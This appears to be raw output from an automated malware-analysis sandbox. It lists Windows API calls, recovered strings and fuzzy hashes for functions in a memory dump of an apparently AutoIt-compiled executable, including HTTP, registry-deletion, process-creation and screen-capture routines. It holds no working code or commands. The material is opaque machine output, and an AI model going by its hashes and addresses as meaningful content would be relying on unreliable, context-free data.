                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051B214
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051B236
                                      • _wcslen.LIBCMT ref: 0051B332
                                        • Part of subcall function 005005A7: GetStdHandle.KERNEL32(000000F6), ref: 005005C6
                                      • _wcslen.LIBCMT ref: 0051B34B
                                      • _wcslen.LIBCMT ref: 0051B366
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0051B3B6
                                      • GetLastError.KERNEL32(00000000), ref: 0051B407
                                      • CloseHandle.KERNEL32(?), ref: 0051B439
                                      • CloseHandle.KERNEL32(00000000), ref: 0051B44A
                                      • CloseHandle.KERNEL32(00000000), ref: 0051B45C
                                      • CloseHandle.KERNEL32(00000000), ref: 0051B46E
                                      • CloseHandle.KERNEL32(?), ref: 0051B4E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                      • String ID:
                                      • API String ID: 2178637699-0
                                      • Opcode ID: e1a2208361cc51e8e6de87a75d76c8fdc141aaaf74e59ac038cb0528b6475303
                                      • Instruction ID: 550ad58acff12de4c2eec5a3f8a5720e6daaf3cb272d7e0990f233a9ccdb8dd1
                                      • Opcode Fuzzy Hash: e1a2208361cc51e8e6de87a75d76c8fdc141aaaf74e59ac038cb0528b6475303
                                      • Instruction Fuzzy Hash: A6F19E315083409FEB14EF25C885B6EBBE1BF85314F14895EF8959B2A2CB35EC84CB56
                                      APIs
                                      • GetMenuItemCount.USER32(00561990), ref: 004D2F8D
                                      • GetMenuItemCount.USER32(00561990), ref: 004D303D
                                      • GetCursorPos.USER32(?), ref: 004D3081
                                      • SetForegroundWindow.USER32(00000000), ref: 004D308A
                                      • TrackPopupMenuEx.USER32(00561990,00000000,?,00000000,00000000,00000000), ref: 004D309D
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004D30A9
                                      Strings
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID: 0
                                      • API String ID: 36266755-4108050209
                                      • Opcode ID: 3a078c07e27b0829d2ab24a5f7634bbeaa3e36354bc7456f14682a1c9e2f27bb
                                      • Instruction ID: fd43e25bfdc41290c48a41f3403766328d86e87e97b24d46abf25e25bcc67291
                                      • Opcode Fuzzy Hash: 3a078c07e27b0829d2ab24a5f7634bbeaa3e36354bc7456f14682a1c9e2f27bb
                                      • Instruction Fuzzy Hash: 50713931640205BEEB218F24CD59FABBF64FF12324F20425BF5146A3E1C7B9A914DB99
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 00526DEB
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00526E5F
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00526E81
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00526E94
                                      • DestroyWindow.USER32(?), ref: 00526EB5
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00490000,00000000), ref: 00526EE4
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00526EFD
                                      • GetDesktopWindow.USER32 ref: 00526F16
                                      • GetWindowRect.USER32(00000000), ref: 00526F1D
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00526F35
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00526F4D
                                        • Part of subcall function 004A9944: GetWindowLongW.USER32(?,000000EB), ref: 004A9952
                                      Strings
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 2429346358-3619404913
                                      • Opcode ID: ea71091beb99df286753e9859563de5a5a9d170dea1182b5f8706897187afd0d
                                      • Instruction ID: c484961886b22bad44300abb180330d966395fb70662bbf76435d107fcd49287
                                      • Opcode Fuzzy Hash: ea71091beb99df286753e9859563de5a5a9d170dea1182b5f8706897187afd0d
                                      • Instruction Fuzzy Hash: 6E714874104254AFDB21CF18EC84ABBBFE9FF9A304F14041EF999972A1D770A90ADB15
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0050C4B0
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0050C4C3
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0050C4D7
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0050C4F0
                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0050C533
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0050C549
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0050C554
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0050C584
                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0050C5DC
                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0050C5F0
                                      • InternetCloseHandle.WININET(00000000), ref: 0050C5FB
                                      Strings
                                      Similarity
                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                      • String ID:
                                      • API String ID: 3800310941-3916222277
                                      • Opcode ID: 7822c476c47e89c1aba85f9a0cc273ec10b3e665d884e6c6c2ee923a8f79d05a
                                      • Instruction ID: c96be2ed3b4274a0386cfa92c27c33daa263e9f033d5446978a0426fb643b928
                                      • Opcode Fuzzy Hash: 7822c476c47e89c1aba85f9a0cc273ec10b3e665d884e6c6c2ee923a8f79d05a
                                      • Instruction Fuzzy Hash: 6A516DB4500605BFDB218F64CD88AAF7FBCFF1A354F04451DF94596291DB34E909ABA0
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00528592
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285A2
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285AD
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285BA
                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285C8
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285D7
                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285E0
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285E7
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005285F8
                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0052FC38,?), ref: 00528611
                                      • GlobalFree.KERNEL32(00000000), ref: 00528621
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00528641
                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00528671
                                      • DeleteObject.GDI32(?), ref: 00528699
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005286AF
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: 976310bf5ce72c96a5d758c6daea77e7ae36a7fec421584d0a03396e5a8c52e1
                                      • Instruction ID: 89be428854ae80c6f43d67bad63a612cec10c7883329a1b1238df75483fffdcd
                                      • Opcode Fuzzy Hash: 976310bf5ce72c96a5d758c6daea77e7ae36a7fec421584d0a03396e5a8c52e1
                                      • Instruction Fuzzy Hash: 87411875601214AFDB219FA5DC48EAE7FB8FFAA711F104058F905E72A1DB30A906DB60
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 00501502
                                      • VariantCopy.OLEAUT32(?,?), ref: 0050150B
                                      • VariantClear.OLEAUT32(?), ref: 00501517
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005015FB
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00501657
                                      • VariantInit.OLEAUT32(?), ref: 00501708
                                      • SysFreeString.OLEAUT32(?), ref: 0050178C
                                      • VariantClear.OLEAUT32(?), ref: 005017D8
                                      • VariantClear.OLEAUT32(?), ref: 005017E7
                                      • VariantInit.OLEAUT32(00000000), ref: 00501823
                                      Strings
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 1234038744-3931177956
                                      • Opcode ID: 9dd2ff8aa9c5a69567d3787842805b2709577907c71a98547d10c5aa762639f5
                                      • Instruction ID: 8a20418504a8edeafee7a755819ebabc9a7c21bd8d10851a6fe4f7af6a534b4b
                                      • Opcode Fuzzy Hash: 9dd2ff8aa9c5a69567d3787842805b2709577907c71a98547d10c5aa762639f5
                                      • Instruction Fuzzy Hash: AED10031A00905EBDB20AF65E885B7DBBB5BF45704F14845AE406AF1C1DB34EC05DFAA
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 0051C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0051B6AE,?,?), ref: 0051C9B5
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051C9F1
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA68
                                        • Part of subcall function 0051C998: _wcslen.LIBCMT ref: 0051CA9E
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0051B6F4
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0051B772
                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0051B80A
                                      • RegCloseKey.ADVAPI32(?), ref: 0051B87E
                                      • RegCloseKey.ADVAPI32(?), ref: 0051B89C
                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0051B8F2
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0051B904
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0051B922
                                      • FreeLibrary.KERNEL32(00000000), ref: 0051B983
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0051B994
                                      Strings
                                      Similarity
                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 146587525-4033151799
                                      • Opcode ID: 3c4b916e2b056c60fb890c0292785a4e09ffe2c3169298984992f82febb8dbb0
                                      • Instruction ID: 0740d49af78db1c94a37725027362f79b804853f2bd8b7ded2767f185eaf6c16
                                      • Opcode Fuzzy Hash: 3c4b916e2b056c60fb890c0292785a4e09ffe2c3169298984992f82febb8dbb0
                                      • Instruction Fuzzy Hash: E2C17C31204201AFE720DF15C495F6ABFE5FF84318F14855DE49A4B2A2CB75ED86CB91
                                      APIs
                                      • GetDC.USER32(00000000), ref: 005125D8
                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005125E8
                                      • CreateCompatibleDC.GDI32(?), ref: 005125F4
                                      • SelectObject.GDI32(00000000,?), ref: 00512601
                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0051266D
                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005126AC
                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005126D0
                                      • SelectObject.GDI32(?,?), ref: 005126D8
                                      • DeleteObject.GDI32(?), ref: 005126E1
                                      • DeleteDC.GDI32(?), ref: 005126E8
                                      • ReleaseDC.USER32(00000000,?), ref: 005126F3
                                      Strings
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 531f3de50d3d4380b8441b27f60dc6f51de81be0f2b4f1414be0b4758b578d5e
                                      • Instruction ID: 562598ef83f45ce2ef87aea350494f348fddb7987def817ed98da8bea87d3656
                                      • Opcode Fuzzy Hash: 531f3de50d3d4380b8441b27f60dc6f51de81be0f2b4f1414be0b4758b578d5e
                                      • Instruction Fuzzy Hash: B0611275D00219EFDF14CFA8C889AAEBBF6FF48300F208429E956A7250D730A951DF90
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 004CDAA1
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD659
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD66B
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD67D
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD68F
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6A1
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6B3
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6C5
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6D7
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6E9
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD6FB
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD70D
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD71F
                                        • Part of subcall function 004CD63C: _free.LIBCMT ref: 004CD731
                                      • _free.LIBCMT ref: 004CDA96
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CDAB8
                                      • _free.LIBCMT ref: 004CDACD
                                      • _free.LIBCMT ref: 004CDAD8
                                      • _free.LIBCMT ref: 004CDAFA
                                      • _free.LIBCMT ref: 004CDB0D
                                      • _free.LIBCMT ref: 004CDB1B
                                      • _free.LIBCMT ref: 004CDB26
                                      • _free.LIBCMT ref: 004CDB5E
                                      • _free.LIBCMT ref: 004CDB65
                                      • _free.LIBCMT ref: 004CDB82
                                      • _free.LIBCMT ref: 004CDB9A
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 48e41096e8fad9502e12f9f59e29fb739ce2622b0939064a4a86139db44c049f
                                      • Instruction ID: 92f02392035430da52bb81d155bbf77dc22c475a35f73c8a6acab713fe20d824
                                      • Opcode Fuzzy Hash: 48e41096e8fad9502e12f9f59e29fb739ce2622b0939064a4a86139db44c049f
                                      • Instruction Fuzzy Hash: 76314CB9A046049FDBA1AA3AD945F57B7E8FF00314F11442FE449D7291DAB9AC40C728
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004F369C
                                      • _wcslen.LIBCMT ref: 004F36A7
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004F3797
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004F380C
                                      • GetDlgCtrlID.USER32(?), ref: 004F385D
                                      • GetWindowRect.USER32(?,?), ref: 004F3882
                                      • GetParent.USER32(?), ref: 004F38A0
                                      • ScreenToClient.USER32(00000000), ref: 004F38A7
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004F3921
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004F395D
                                      Strings
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                      • String ID: %s%u
                                      • API String ID: 4010501982-679674701
                                      • Opcode ID: 3e7b8191b9cd0b7a872b765fef04b226e7f7a77e349acf61bf2768759c6ce00d
                                      • Instruction ID: 11bece4b27139770c2faaa7093594b1f28784283f475b710ccc4b6660e18a5a3
                                      • Opcode Fuzzy Hash: 3e7b8191b9cd0b7a872b765fef04b226e7f7a77e349acf61bf2768759c6ce00d
                                      • Instruction Fuzzy Hash: 5991B37120460AAFD718DF24C885FBBF7E8FF44355F00851AFA99C2250DB78AA49CB95
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004F4994
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004F49DA
                                      • _wcslen.LIBCMT ref: 004F49EB
                                      • CharUpperBuffW.USER32(?,00000000), ref: 004F49F7
                                      • _wcsstr.LIBVCRUNTIME ref: 004F4A2C
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 004F4A64
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004F4A9D
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 004F4AE6
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004F4B20
                                      • GetWindowRect.USER32(?,?), ref: 004F4B8B
                                      Strings
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                      • String ID: ThumbnailClass
                                      • API String ID: 1311036022-1241985126
                                      • Opcode ID: a7afe13eda4a4adc83e9b46daf37271ae1a1a4949f0916930e6b5c95c846108e
                                      • Instruction ID: c2c710c4ca66d2a62a0e69d94aeb122f42c315d266522b60653078b3a6dc99fe
                                      • Opcode Fuzzy Hash: a7afe13eda4a4adc83e9b46daf37271ae1a1a4949f0916930e6b5c95c846108e
                                      • Instruction Fuzzy Hash: 6891AD711042099FDB14CF15C981BBB7BA8EF84314F04446AEE859A296DB38ED49CBA9
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00528D5A
                                      • GetFocus.USER32 ref: 00528D6A
                                      • GetDlgCtrlID.USER32(00000000), ref: 00528D75
                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00528E1D
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00528ECF
                                      • GetMenuItemCount.USER32(?), ref: 00528EEC
                                      • GetMenuItemID.USER32(?,00000000), ref: 00528EFC
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00528F2E
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00528F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00528FA1
                                      Strings
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                      • String ID: 0
                                      • API String ID: 1026556194-4108050209
                                      • Opcode ID: 8d1d99e2973499ecee0ef5a93ae00a0eed51996c4d2ca96ebe3698c7870a2b33
                                      • Instruction ID: 8755ce0836bef653970609b3bdfc0838c3b5ae41dbabcc770bc3e837b445c97c
                                      • Opcode Fuzzy Hash: 8d1d99e2973499ecee0ef5a93ae00a0eed51996c4d2ca96ebe3698c7870a2b33
                                      • Instruction Fuzzy Hash: 4C81CC71509321ABDB20CF64E984ABB7FE9FF9A314F04091DF98497291DB30E905DBA1
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004FDC20
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004FDC46
                                      • _wcslen.LIBCMT ref: 004FDC50
                                      • _wcsstr.LIBVCRUNTIME ref: 004FDCA0
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004FDCBC
                                      Strings
                                      Similarity
                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 1939486746-1459072770
                                      • Opcode ID: 1d3fe703d810639c23b01d1ed8395eda347ea1b3ef4bbd57d4518c2ce13085fa
                                      • Instruction ID: 2708fab28200b6da61f06f7b09817ce741ab405283ebd77f6407f6ff4d3288e9
                                      • Opcode Fuzzy Hash: 1d3fe703d810639c23b01d1ed8395eda347ea1b3ef4bbd57d4518c2ce13085fa
                                      • Instruction Fuzzy Hash: A44128329402147AEB14A7759C43EFF7BACEF56714F10016FFA00A6183EB78990596BD
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0051CC64
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0051CC8D
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0051CD48
                                        • Part of subcall function 0051CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0051CCAA
                                        • Part of subcall function 0051CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0051CCBD
                                        • Part of subcall function 0051CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0051CCCF
                                        • Part of subcall function 0051CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0051CD05
                                        • Part of subcall function 0051CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0051CD28
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0051CCF3
                                      Strings
                                      Similarity
                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2734957052-4033151799
                                      • Opcode ID: 37838c4edf0257ce7f0936ca44c5467b378be9b92940dd80b24b91cc3273049b
                                      • Instruction ID: 4610fac14365ebb3c67313ef99833977d7af7b11070954c507a8260ff8516f93
                                      • Opcode Fuzzy Hash: 37838c4edf0257ce7f0936ca44c5467b378be9b92940dd80b24b91cc3273049b
                                      • Instruction Fuzzy Hash: D5318E71941129BBEB308B50DC88EFFBF7CFF56744F000165A905E6241DA749E8AEAE0
                                      APIs
                                      • timeGetTime.WINMM ref: 004FE6B4
                                        • Part of subcall function 004AE551: timeGetTime.WINMM(?,?,004FE6D4), ref: 004AE555
                                      • Sleep.KERNEL32(0000000A), ref: 004FE6E1
                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 004FE705
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004FE727
                                      • SetActiveWindow.USER32 ref: 004FE746
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004FE754
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004FE773
                                      • Sleep.KERNEL32(000000FA), ref: 004FE77E
                                      • IsWindow.USER32 ref: 004FE78A
                                      • EndDialog.USER32(00000000), ref: 004FE79B
                                      Strings
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: ea8848ce556931a3c5c75d2913bb17b938477890afb6feb9cd28b9d5103f8e7c
                                      • Instruction ID: efe78976d21dc3f91a6b2b98101b2480f557e21ee49ef591e6babd1fccc79723
                                      • Opcode Fuzzy Hash: ea8848ce556931a3c5c75d2913bb17b938477890afb6feb9cd28b9d5103f8e7c
                                      • Instruction Fuzzy Hash: 02219B70200608AFFB105F6BEC8DA3A3F59FB7574AF100426F51282272DBB5AC19B719
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004FEA5D
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004FEA73
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FEA84
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004FEA96
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004FEAA7
                                      Strings
                                      Similarity
                                      • API ID: SendString$_wcslen
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2420728520-1007645807
                                      • Opcode ID: 57097993dd26bb1942cf396d3e335065ca53f7bb3ed9df323432d44e292b6f98
                                      • Instruction ID: 98fadca0ca0dd9c0a1ba5a1a5e9dd94b1c8bd49f9c97aaa743e8ee07529fb453
                                      • Opcode Fuzzy Hash: 57097993dd26bb1942cf396d3e335065ca53f7bb3ed9df323432d44e292b6f98
                                      • Instruction Fuzzy Hash: E0118F61A902597DDB20A7A2DC5ADFF6E7CFBD2F05F40042B7801A20E1EA740909C5B5
                                      APIs
                                        • Part of subcall function 004A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004A8BE8,?,00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004A8FC5
                                      • DestroyWindow.USER32(?), ref: 004A8C81
                                      • KillTimer.USER32(00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004A8D1B
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 004E6973
                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004E69A1
                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,004A8BBA,00000000,?), ref: 004E69B8
                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004A8BBA,00000000), ref: 004E69D4
                                      • DeleteObject.GDI32(00000000), ref: 004E69E6
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: c419922a8de731ee76cec2938a4915c60e48bb0a3dcdea81ecce90b4669c02c0
                                      • Instruction ID: 23155225d95b58d6109652a722df9acba96ebca74ef9770de1738ec01793199a
                                      • Opcode Fuzzy Hash: c419922a8de731ee76cec2938a4915c60e48bb0a3dcdea81ecce90b4669c02c0
                                      • Instruction Fuzzy Hash: D161CE30402A40DFCB359F19C94872A7BF1FF72366F18452EE04297660CB79A885EF58
                                      APIs
                                        • Part of subcall function 004A9944: GetWindowLongW.USER32(?,000000EB), ref: 004A9952
                                      • GetSysColor.USER32(0000000F), ref: 004A9862
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 105d587109b0568078a53b5a2046d7de246cd0c58c9d2cd9739f571a88c608d2
                                      • Instruction ID: 6acf86d9f4f029fe0e51dd2453765a5bf48dc3309a098decbc5e62ad9ad90370
                                      • Opcode Fuzzy Hash: 105d587109b0568078a53b5a2046d7de246cd0c58c9d2cd9739f571a88c608d2
                                      • Instruction Fuzzy Hash: 7441D631100640AFDB305F399C84BBA3B65EB27331F14464AF9A2872E2C73C9C46EB15
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,004DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 004F9717
                                      • LoadStringW.USER32(00000000,?,004DF7F8,00000001), ref: 004F9720
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,004DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 004F9742
                                      • LoadStringW.USER32(00000000,?,004DF7F8,00000001), ref: 004F9745
                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 004F9866
                                      Strings
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 747408836-2268648507
                                      • Opcode ID: 9af70dc6b7692ff48b530b8273594e3c258eb20642be6e5cbd47f06df0a0db59
                                      • Instruction ID: 2e96661ae946741e3a3ca808db23f52b03b2c453d9c19848db8a712554329888
                                      • Opcode Fuzzy Hash: 9af70dc6b7692ff48b530b8273594e3c258eb20642be6e5cbd47f06df0a0db59
                                      • Instruction Fuzzy Hash: AC414072800109AACF14FBD5CD46EFE7B78AF15745F50002EB60572092EB796F48CA65
                                      APIs
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004F07A2
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004F07BE
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004F07DA
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004F0804
                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004F082C
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F0837
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004F083C
                                      Strings
                                      Memory Dump Source
